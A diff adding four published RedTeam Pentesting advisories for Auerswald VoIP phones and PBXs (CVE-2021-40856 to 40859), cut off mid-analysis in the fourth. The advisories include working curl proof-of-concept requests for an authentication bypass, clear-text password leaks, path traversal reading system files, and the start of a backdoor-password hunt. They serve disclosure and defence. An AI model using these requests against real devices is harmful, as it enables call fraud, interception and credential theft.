diff --git a/exploits/hardware/remote/50565.txt b/exploits/hardware/remote/50565.txt
new file mode 100644
index 000000000..b837d5ddc
--- /dev/null
+++ b/exploits/hardware/remote/50565.txt
@@ -0,0 +1,317 @@
+# Exploit Title: Auerswald COMfortel 2.8F - Authentication Bypass
+# Date: 06/12/2021
+# Exploit Author: RedTeam Pentesting GmbH
+# Version: 1400/2600/3600
+
+Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass
+
+
+RedTeam Pentesting discovered a vulnerability in the web-based
+configuration management interface of the Auerswald COMfortel 1400 and
+2600 IP desktop phones. The vulnerability allows accessing configuration
+data and settings in the web-based management interface without
+authentication.
+
+
+Details
+=======
+
+Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP
+Affected Versions: <= 2.8F
+Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)
+Vulnerability Type: Authentication Bypass
+Security Risk: high
+Vendor URL: https://www.auerswald.de
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004
+Advisory Status: published
+CVE: CVE-2021-40856
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856
+
+
+Introduction
+============
+
+"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and
+IP system phone), with 4.3" colour touch display and preconfigured
+answering machine"
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+During a penetration test it was discovened that several VoIP phones
+(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow
+accessing administrative functions without login credentials, bypassing
+the authentication. This can be achieved by simply prefixing API
+endpoints that require authentication with "/about/../", since the
+"/about" endpoint does not require any authentication.
+
+
+Proof of Concept
+================
+
+The phones run a web-based management interface on Port 80. If accessed,
+the HTTP response code 401 together with a website redirecting to the
+path "/statics/pageChallenge.html" is returned. This can for example be
+seen using the command-line HTTP client curl[1] as follows:
+
+------------------------------------------------------------------------
+$ curl --include 'http://192.168.1.190/'
+HTTP/1.1 401 Unauthorized
+[...]
+
+
+------------------------------------------------------------------------
+
+The website contains JavaScript code that requests the path
+"/about?action=get" and loads a JSON document (formatted and shortened
+to increase readability):
+
+------------------------------------------------------------------------
+$ curl --include 'http://192.168.1.190/about?action=get'
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+Cache-Control: no-cache
+Content-Length: 3673
+Date: Mon, 30 Aug 2021 08:39:24 GMT
+Server: lighttpd
+
+{
+ "DATA": {
+ "firmware": {
+ "TYPE": "DATAITEM",
+ "VALUE": "2.8E",
+ "KEY": "firmware"
+ },
+ "serial": {
+ "TYPE": "DATAITEM",
+ "VALUE": "1234567890",
+ "KEY": "serial"
+ },
+ [...]
+ }
+}
+
+------------------------------------------------------------------------
+
+Among other information, this JSON document contains the serial number
+and firmware version displayed on the website. This action can be
+accessed without authentication. Other endpoints require authentication,
+for example the path "/tree?action=get", from which the menu structure
+is loaded after successful authentication:
+
+------------------------------------------------------------------------
+$ curl --include 'http://192.168.1.190/tree?action=get'
+HTTP/1.1 401 Unauthorized
+[...]
+
+
+------------------------------------------------------------------------
+
+During the penetration test, it was discovered that this action can
+successfully be requested by inserting the prefix "/about/../". In order
+to prevent curl from normalizing the URL path, the option "--path-as-is"
+must be supplied:
+
+------------------------------------------------------------------------
+$ curl --include --path-as-is \
+ 'http://192.168.1.190/about/../tree?action=get'
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+Cache-Control: no-cache
+Content-Length: 3808
+Date: Mon, 30 Aug 2021 08:42:11 GMT
+Server: lighttpd
+
+{
+ "TYPE": "TREENODEPAGE",
+ "ITEMS": {
+ "COUNT": 2,
+ "TYPE": "ITEMLIST",
+ "1": {
+ "id": 31,
+ "text": "applications_settings",
+ "TYPE": "TREENODEPAGE",
+ "ITEMS": {
+ "COUNT": 1,
+ "TYPE": "ITEMLIST",
+ "0": {
+ "target": "pageFunctionkeys.html",
+ "id": 32,
+ "action": "/functionkeys",
+ "text": "key_app",
+ "pagename": "Functionkeys",
+ "TYPE": "TREENODEPAGE"
+ }
+ }
+ },
+ [...]
+ }
+}
+------------------------------------------------------------------------
+
+The endpoint "/account" allows listing account data:
+
+------------------------------------------------------------------------
+$ curl --include --path-as-is \
+ 'http://192.168.1.190/about/../account?action=list'
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+Cache-Control: no-cache
+Content-Length: 793
+Date: Mon, 30 Aug 2021 08:43:33 GMT
+Server: lighttpd
+
+{
+ "DATA": {
+ [...]
+ "accountList0": {
+ "KEY": "accountList0",
+ "COUNT": 1,
+ "TYPE": "DATAMODEL",
+ "VALUE": {
+ "0": {
+ "ID": 32327,
+ "PARENTID": 0,
+ "PROVIDER": "ProviderName",
+ "NAME": "123 Example User",
+ "STATUS": 4,
+ "DEFAULT": 1
+ }
+ },
+ [...]
+ },
+ }
+}
+------------------------------------------------------------------------
+
+The ID 32327 can then be used to get details about that particular
+account, including the username and password:
+
+------------------------------------------------------------------------
+$ curl --include --path-as-is \
+ 'http://192.168.1.190/about/../account?action=get&itemID=32327'
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+Cache-Control: no-cache
+Content-Length: 2026
+Date: Mon, 30 Aug 2021 08:44:13 GMT
+Server: lighttpd
+
+{
+ "DATA": {
+ [...]
+ "Benutzer": {
+ "TYPE": "DATAITEM",
+ "VALUE": "123",
+ "KEY": "Benutzer"
+ },
+ "Passwort": {
+ "TYPE": "DATAITEM",
+ "VALUE": "secret",
+ "KEY": "Passwort"
+ },
+ [...]
+ }
+}
+------------------------------------------------------------------------
+
+Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to
+access and use the web-based management interface as if regular login
+credentials were presented.
+
+It is likely that other functionality can be accessed in the same way,
+to for example change settings or activate the integrated option for
+recording the Ethernet traffic.
+
+
+Workaround
+==========
+
+Disable the web-based management interface if possible.
+
+
+Fix
+===
+
+Upgrade to a firmware version which corrects this vulnerability.
+
+
+Security Risk
+=============
+
+Inserting the prefix "/about/../" allows bypassing the authentication
+check for the web-based configuration management interface. This enables
+attackers to gain access to the login credentials used for
+authentication at the PBX, among other data.
+
+Attackers can then authenticate at the PBX as the respective phone and
+for example call premium rate phone lines they operate to generate
+revenue. They can also configure a device they control as the PBX in the
+phone, so all incoming and outgoing phone calls are intercepted and can
+be recorded. The device also contains a function to record all Ethernet
+data traffic, which is likely affected as well.
+
+Overall, the vulnerability completely bypasses the authentication for
+the web-based management interface and therefore poses a high risk.
+
+
+References
+==========
+
+[1] https://curl.se
+[2] https://github.com/zaproxy/zaproxy/
+
+Timeline
+========
+
+2021-08-26 Vulnerability identified
+2021-09-01 Customer approved disclosure to vendor
+2021-09-10 Vendor notified
+2021-09-10 CVE ID requested
+2021-09-10 CVE ID assigned
+2021-10-04 Vendor provides access to device with fixed firmware
+2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected
+2021-10-14 Vendor releases corrected firmware version 2.8G
+2021-12-06 Advisory published
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://www.redteam-pentesting.de/jobs/
+
+
+--
+RedTeam Pentesting GmbH Tel.: +49 241 510081-0
+Dennewartstr. 25-27 Fax : +49 241 510081-99
+52068 Aachen https://www.redteam-pentesting.de
+Germany Registergericht: Aachen HRB 14004
+Geschäftsführer: Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/exploits/hardware/remote/50567.txt b/exploits/hardware/remote/50567.txt
new file mode 100644
index 000000000..08045a1f3
--- /dev/null
+++ b/exploits/hardware/remote/50567.txt
@@ -0,0 +1,301 @@
+# Exploit Title: Auerswald COMpact 8.0B - Privilege Escalation
+# Date: 06/12/2021
+# Exploit Author: RedTeam Pentesting GmbH
+
+Advisory: Auerswald COMpact Privilege Escalation
+
+
+RedTeam Pentesting discovered a vulnerability in the web-based
+management interface of the Auerswald COMpact 5500R PBX which allows
+low-privileged users to access passwords of administrative user accounts.
+
+
+Details
+=======
+
+Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
+Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
+Fixed Versions: 8.2B
+Vulnerability Type: Privilege Escalation
+Security Risk: high
+Vendor URL: https://www.auerswald.de/en/product/compact-5500r
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005
+Advisory Status: published
+CVE: CVE-2021-40857
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857
+
+
+Introduction
+============
+
+"Fully modular VoIP appliance for more efficient communication processes
+With the COMpact 5500R, you are originally equipped for everyday
+business - now and in the future.
+
+The fully modular architecture with 80 IP channels and all the functions
+of a large ITC server allows up to 112 subscribers and thus scales with
+your company.
+
+Continuous maintanance and expansion of the system software makes this
+versatile IP server a future-proof investment in any business
+communication."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+Attackers with low-privileged user accounts, for example those that are
+used by VoIP phones, can log into the web-based management interface of
+the COMpact 5500R PBX. Afterwards, the list of user accounts can be
+listed and details shown for each user account. Adding the URL parameter
+"passwd=1" then also includes the clear text password for each user
+account, including administrative ones, which can then be used to
+authenticate against the management interface.
+
+
+Proof of Concept
+================
+
+The command-line HTTP client curl[1] can be used as follows to log in
+with the username "123" and the password "secret" (shortened and
+formatted to increase readability):
+
+------------------------------------------------------------------------
+$ curl --anyauth --user 123:secret --include https://192.168.1.2/tree
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/
+[...]
+
+[
+ {
+ "login": 1,
+ "userId": 1234,
+ "userRufNr": "123",
+ "userName": "123",
+ "pbxType": 35,
+ "pbxId": 0,
+ "pbx": "COMpact 5500R",
+ "pbxEdit": "Comp.5500R",
+ "isActivated": 1,
+ "dongleTnCount": 112,
+ "currentConfig": 34,
+ "cur": "EUR",
+ "language": 0,
+ "hidePrivat": 1,
+ "offlineConfig": false
+ },
+ [...]
+]
+------------------------------------------------------------------------
+
+The server returns a JSON document describing the user account as well
+as a session ID in a cookie. This session ID can then be used to access
+other API endpoints on the PBX. The following listing shows the request to
+the path "/logstatus_state", which returns the current access level:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
+ https://192.168.1.2/logstatus_state
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{"logstatus":"Teilnehmer"}
+------------------------------------------------------------------------
+
+The access level in this case is "Teilnehmer" (member).
+
+The list of all other users can be requested as follows:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
+ https://192.168.1.2/cfg_data_teilnehmer
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+[
+[...]
+{"id":1234,"nr":"123","name":"Example User","isSubAdmin":false},
+[...]
+{"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true}
+[...]
+]
+------------------------------------------------------------------------
+
+Two user accounts are shown in the listing above: the current user's
+account with the ID 1234 and a different user account with so-called
+"sub-admin" privileges with the ID 2222.
+
+Details about a particular user account with a given ID can be requested
+like this:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
+ 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234'
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{"rufnr":"123","name":"Example User",[...],
+"privatPin":"XXXXXX","privatPass":"XXXXXXXXXX","privatToken":"XXXXXXXXXX",
+[...], "isSubadmin":0,[...]}
+------------------------------------------------------------------------
+
+In the returned JSON document, the values of the fields for the PIN,
+token and password are replaced by "XXX". But if the URL parameter
+"passwd" is set to the value 1, the values are returned in plain text:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
+ 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1'
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{"rufnr":"123","name":"Example User",[...],
+"privatPin":"12345678","privatPass":"secretpassword",
+"privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]}
+------------------------------------------------------------------------
+
+This can be repeated for other user accounts, for example for the
+user account with the ID 2222 shown it the listing earlier. The server
+returns the plain text password for the other user account:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
+ 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{"rufnr":"555","name":"sub-admin other user","privatPin":"99999999",
+"privatPass":"verysecretpassword","privatToken":"zzzzzzzzzz",
+[...],"isSubadmin":1,[...]}
+------------------------------------------------------------------------
+
+The password can then be used to log into the PBX with the other user
+account:
+
+------------------------------------------------------------------------
+$ curl --anyauth --user sub-admin:verysecretpassword --include \
+ https://192.168.1.2/tree
+
+[...]
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
+[...]
+
+[{"login":2,"userId":2222,[...]}]
+------------------------------------------------------------------------
+
+Checking the access level with the new session ID shows that the user is
+now logged in with an administrative account:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
+ https://192.168.1.2/logstatus_state
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{"logstatus":"Sub-Administrator"}%
+------------------------------------------------------------------------
+
+
+Workaround
+==========
+
+Disable or restrict access to the web-based management interface if
+possible.
+
+
+Fix
+===
+
+Upgrade to a firmware version which corrects this vulnerability.
+
+
+Security Risk
+=============
+
+Attackers who have acquired access to a low-privileged user account, for
+example by extracting such an account from a VoIP phone, can log into
+the web-based management interface of the COMpact 5500R PBX and access
+clear text passwords for other user accounts, including those with the
+"sub-admin" privilege. After logging in with these newly acquired
+credentials, attackers can access configuration settings and most other
+functions.
+
+They can then for example create new SIP credentials and use them to
+call premium rate phone lines they operate to generate revenue. They can
+monitor and even redirect all incoming and outgoing phone calls and
+record all Ethernet data traffic.
+
+Due to the severe and far-reaching consequences and despite the
+prerequisite of having to know an existing low-privilege user account,
+this vulnerability rated as a high risk.
+
+
+Timeline
+========
+
+2021-08-26 Vulnerability identified
+2021-09-01 Customer approved disclosure to vendor
+2021-09-10 Vendor notified
+2021-09-10 CVE ID requested
+2021-09-10 CVE ID assigned
+2021-10-05 Vendor provides access to device with fixed firmware
+2021-10-11 Vendor provides fixed firmware
+2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
+2021-12-06 Advisory published
+
+
+References
+==========
+
+[1] https://curl.se/
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://www.redteam-pentesting.de/jobs/
+
+
+--
+RedTeam Pentesting GmbH Tel.: +49 241 510081-0
+Dennewartstr. 25-27 Fax : +49 241 510081-99
+52068 Aachen https://www.redteam-pentesting.de
+Germany Registergericht: Aachen HRB 14004
+Geschäftsführer: Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/exploits/hardware/remote/50568.txt b/exploits/hardware/remote/50568.txt
new file mode 100644
index 000000000..901c60a3c
--- /dev/null
+++ b/exploits/hardware/remote/50568.txt
@@ -0,0 +1,302 @@
+# Exploit Title: Auerswald COMpact 8.0B - Arbitrary File Disclosure
+# Date: 06/12/2021
+# Exploit Author: RedTeam Pentesting GmbH
+
+Advisory: Auerswald COMpact Arbitrary File Disclosure
+
+
+RedTeam Pentesting discovered a vulnerability in the web-based
+management interface of the Auerswald COMpact 5500R PBX which allows
+users with the "sub-admin" privilege to access any files on the PBX's
+file system.
+
+
+Details
+=======
+
+Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
+Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
+Fixed Versions: 8.2B
+Vulnerability Type: Arbitrary File Disclosure
+Security Risk: medium
+Vendor URL: https://www.auerswald.de/en/product/compact-5500r
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006
+Advisory Status: published
+CVE: CVE-2021-40858
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858
+
+
+Introduction
+============
+
+"Fully modular VoIP appliance for more efficient communication processes
+With the COMpact 5500R, you are originally equipped for everyday
+business - now and in the future.
+
+The fully modular architecture with 80 IP channels and all the functions
+of a large ITC server allows up to 112 subscribers and thus scales with
+your company.
+
+Continuous maintanance and expansion of the system software makes this
+versatile IP server a future-proof investment in any business
+communication."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+RedTeam Pentesting discovered that attackers with administrative access
+to the PBX's web-based management interface (as a so-called "sub-admin")
+can download arbitrary files from the PBX's file system. This includes
+the usually not accessible configuration database which contains the
+password for the highly privileged "Admin" user in clear text.
+
+
+Proof of Concept
+================
+
+The command-line HTTP client curl[1] can be used to log into the
+management interface of the PBX with the username "sub-admin" and the
+password "verysecretpassword" as follows:
+
+------------------------------------------------------------------------
+$ curl --anyauth --user sub-admin:verysecretpassword --include \
+ https://192.168.1.2/tree
+
+[...]
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
+[...]
+
+[{"login":2,"userId":2222,[...]}]
+------------------------------------------------------------------------
+
+The server returns a session ID in a cookie which is then used to check
+the access level:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
+ https://192.168.1.2/logstatus_state
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{"logstatus":"Sub-Administrator"}
+------------------------------------------------------------------------
+
+In the PBX's user management, the access level "Sub-Administrator" is
+used for user accounts who should be able to configure the PBX. There
+are also other, higher-level access privileges.
+
+Users with the "sub-admin" privilege can configure music on hold (MOH,
+"Wartemusik"), and for example listen to the currently configured music.
+In order to do this, the browser requests the music files from the PBX.
+
+The file "alarm1.wav" can be accessed with curl as follows:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
+'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\
+'&pageindex=1'
+
+HTTP/1.1 200 OK
+Content-Type: audio/x-wav; charset=
+Content-Length: 132192
+Content-disposition: attachment; filename="alarm1.wav"
+[...]
+------------------------------------------------------------------------
+
+It was found that the PBX allows directory traversal with the string
+"../", so the file "/etc/passwd" can be accessed as follows:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
+'https://192.168.1.2/wartemusik_verwaltung_play?'\
+'fileName=../../etc/passwd&pageindex='
+
+HTTP/1.1 200 OK
+[...]
+Content-Length: 113
+Content-disposition: attachment; filename="../../etc/passwd"
+[...]
+
+root::0:0:root:/root:/bin/sh
+netstorage::1:1::/data/ftpd:/bin/false
+web::2:2::/opt/auerswald/lighttpd:/bin/false
+------------------------------------------------------------------------
+
+The same issue is present in the function for managing logos. A regular
+request for the file "logo1.jpg" is shown below:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
+'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'
+
+HTTP/1.1 200 OK
+X-XSS-Protection: 1
+Content-Type: image/jpg; charset=UTF-8
+Content-Length: 13986
+Content-disposition: attachment; filename="logo1.jpg"
+[...]
+------------------------------------------------------------------------
+
+In a similar fashion as before, the file "/etc/passwd" can be accessed:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
+'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'
+
+HTTP/1.1 200 OK
+[...]
+
+root::0:0:root:/root:/bin/sh
+netstorage::1:1::/data/ftpd:/bin/false
+web::2:2::/opt/auerswald/lighttpd:/bin/false
+------------------------------------------------------------------------
+
+For attackers, an interesting file is the SQLite[2] database file
+"/data/db/pbx4.db". It can be downloaded as follows:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\
+'192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \
+ > pbx4.db
+
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 5120 100 5120 0 0 16253 0 --:--:-- --:--:-- --:--:-- 16305
+------------------------------------------------------------------------
+
+This file contains the password for the highly privileged "Admin" user
+account:
+
+------------------------------------------------------------------------
+$ sqlite3 pbx4.db
+SQLite version 3.27.2 2019-02-25 16:06:06
+Enter ".help" for usage hints.
+
+sqlite> .tables
+DbFileVersion PbxMisc
+
+sqlite> select * from PbxMisc;
+[...]
+AdminPasswdHash|
+AdminLogin|Admin
+AdminPin|43214321
+AdminPasswd|S3kr1t!
+------------------------------------------------------------------------
+
+The username and password can then be used to log into the web
+application:
+
+------------------------------------------------------------------------
+$ curl --user 'Admin:S3kr1t!' --anyauth --include \
+ https://192.168.1.2/tree
+
+HTTP/1.1 200 OK
+Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/
+[...]
+
+[{"login":3,"userId":0,"userName":"",[...]}]
+------------------------------------------------------------------------
+
+Checking the access level reveals the new privilege:
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \
+ https://192.168.1.2/logstatus_state
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{"logstatus":"Administrator"}
+------------------------------------------------------------------------
+
+The user "Admin", in contrast to regular administrative users
+("sub-admin"), can access more functions and for example apply firmware
+updates.
+
+Workaround
+==========
+
+Disable or restrict access to the web-based management if possible.
+
+
+Fix
+===
+
+Upgrade to a firmware version which corrects this vulnerability.
+
+
+Security Risk
+=============
+
+Attackers who already have acquired administrative access as a so-called
+"sub-admin" can download a database file and access the password for the
+highly privileged "Admin" account. This account can use more functions and
+is allowed to apply firmware updates.
+
+On the one hand, exploiting this vulnerability already requires
+administrative access. On the other hand, attackers can reach
+high-privileged access to the PBX and use functions not available to
+"sub-admin" users, like firmware updates. All in all, this vulnerability
+is therefore rated to have a medium risk potential.
+
+
+Timeline
+========
+
+2021-08-26 Vulnerability identified
+2021-09-01 Customer approved disclosure to vendor
+2021-09-10 Vendor notified
+2021-09-10 CVE ID requested
+2021-09-10 CVE ID assigned
+2021-10-05 Vendor provides access to device with fixed firmware
+2021-10-11 Vendor provides fixed firmware
+2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
+2021-12-06 Advisory published
+
+
+References
+==========
+
+[1] https://curl.se
+[2] https://www.sqlite.org
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://www.redteam-pentesting.de/jobs/
+
+
+--
+RedTeam Pentesting GmbH Tel.: +49 241 510081-0
+Dennewartstr. 25-27 Fax : +49 241 510081-99
+52068 Aachen https://www.redteam-pentesting.de
+Germany Registergericht: Aachen HRB 14004
+Geschäftsführer: Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/exploits/hardware/remote/50569.txt b/exploits/hardware/remote/50569.txt
new file mode 100644
index 000000000..a5fc22684
--- /dev/null
+++ b/exploits/hardware/remote/50569.txt
@@ -0,0 +1,350 @@
+# Exploit Title: Auerswald COMpact 8.0B - Multiple Backdoors
+# Date: 06/12/2021
+# Exploit Author: RedTeam Pentesting GmbH
+
+Advisory: Auerswald COMpact Multiple Backdoors
+
+
+RedTeam Pentesting discovered several backdoors in the firmware for the
+Auerswald COMpact 5500R PBX. These backdoors allow attackers who are
+able to access the web-based management application full administrative
+access to the device.
+
+
+Details
+=======
+
+Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP, COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
+Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)), <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP)
+Fixed Versions: 8.2B, 4.0T
+Vulnerability Type: Backdoor
+Security Risk: high
+Vendor URL: https://www.auerswald.de/en/product/compact-5500r
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007
+Advisory Status: published
+CVE: CVE-2021-40859
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859
+
+
+Introduction
+============
+
+"Fully modular VoIP appliance for more efficient communication processes
+With the COMpact 5500R, you are originally equipped for everyday
+business - now and in the future.
+
+The fully modular architecture with 80 IP channels and all the functions
+of a large ITC server allows up to 112 subscribers and thus scales with
+your company.
+
+Continuous maintanance and expansion of the system software makes this
+versatile IP server a future-proof investment in any business
+communication."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+Two backdoor passwords were found in the firmware of the COMpact 5500R
+PBX. One backdoor password is for the secret user "Schandelah", the
+other can be used for the highest-privileged user "Admin". No way was
+discovered to disable these backdoors.
+
+
+Proof of Concept
+================
+
+The firmware for the COMpact 5500R can be downloaded from the vendor's
+homepage[1]. The following details refer to firmware version 7.8A, but
+the latest firmware at the time of writing (8.0B) is affected as well.
+
+Inspecting the downloaded file reveals that it is compressed and can be
+extracted with the program "gunzip":
+
+------------------------------------------------------------------------
+$ file 7_8A_002_COMpact5500.rom
+7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23
+15:04:43 2020, from Unix, original size 196976698
+
+$ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz
+
+$ gunzip 7_8A_002_COMpact5500.gz
+------------------------------------------------------------------------
+
+Analysing the resulting file again shows that it is an image file in the
+format required by the bootloader "Das U-Boot"[2], a popular bootloader
+for embedded devices:
+
+------------------------------------------------------------------------
+$ file 7_8A_002_COMpact5500.rom
+
+7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM,
+Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38
+2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC: 0
+xCECA93E8, Data CRC: 0x99E65DF1
+------------------------------------------------------------------------
+
+The program "dumpimage" (included with u-boot) can be used to list the
+partitions in the image file:
+
+------------------------------------------------------------------------
+$ dumpimage -l 7_8A_002_COMpact5500.rom
+Image Name:
+CP5500 125850
+Created:
+Wed Sep 23 17:04:38 2020
+Image Type:
+ARM Linux Multi-File Image (uncompressed)
+Data Size:
+196976634 Bytes = 192359.99 KiB = 187.85 MiB
+Load Address: 00000000
+Entry Point: 00000000
+Contents:
+Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB
+Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB
+------------------------------------------------------------------------
+
+The larger partition then was extracted into the file "rootfs" as
+follows:
+
+------------------------------------------------------------------------
+$ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs
+------------------------------------------------------------------------
+
+Contained in the file is an ext2-compatible file system, which was
+mounted at "/mnt" and inspected:
+
+------------------------------------------------------------------------
+$ file rootfs
+
